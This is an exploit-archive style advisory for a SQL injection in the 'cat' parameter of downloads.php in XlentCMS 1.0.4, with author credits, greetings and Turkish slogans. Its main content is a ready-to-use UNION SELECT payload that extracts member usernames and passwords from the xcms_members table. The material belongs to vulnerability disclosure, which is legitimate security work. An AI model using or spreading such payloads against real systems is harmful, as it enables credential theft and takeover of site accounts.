XlentCMS version 1.0.4 suffers from a remote SQL injection vulnerability in downloads.php.
ad05319ad8133c039b12bd170db26afcbd98db8d40d2a0d9b7e3890c6fed80a5
Script : XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability
Script site : http://sphere.xlentprojects.se/portal.php
AUTHOR : Gamoscu
HOME : http://www.1923turk.biz
Blog : http://gamoscu.wordpress.com/
Greetz : Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/downloads.php?cat=[SQL]
Example:
1+union+select+1,id,3,4,username%20,password,7,8,9+from+xcms_members--
Vatan Lafla De�il Eylemle Sevilir
Kiskananlar catlasin Zorunuza Gitmesin